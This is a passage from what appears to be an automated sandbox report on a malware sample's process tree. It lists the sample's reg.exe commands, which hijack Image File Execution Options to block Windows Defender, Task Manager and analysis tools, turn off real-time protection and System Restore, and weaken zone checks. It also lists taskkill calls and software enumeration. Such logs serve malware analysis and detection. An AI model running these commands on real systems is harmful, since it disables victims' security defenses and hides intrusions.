  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1976
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1988
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1972
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:1052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1292
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:816
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:1508
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1272
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1460
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:956
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:828
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:476
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1056
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:1084
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:604
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:564
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1400
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:268
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2072
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1988
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:816
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1816
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1524
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1744
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1980
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1868
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:708
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1020
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1444
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1412
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:760
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1944
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2092
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:2156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2104
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2220
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:2332
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:2368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:2436
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2416
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:2500
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:2536
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:2568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2640
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2728
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:2784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2820
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:2864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:2892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:2936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:2968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:3024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:3048
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:2056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:564
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:1268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:1788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1040
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:1272
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1732
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:2076
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:2112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:2176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:2164
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:1840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2200
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:2228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2336
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:2480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2492
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:2520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:2536
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2716
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2272
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2144
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1676
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2124
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2084
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1904
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2888
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2940
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:288
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1092
- - C:\Windows\system32\reg.exe
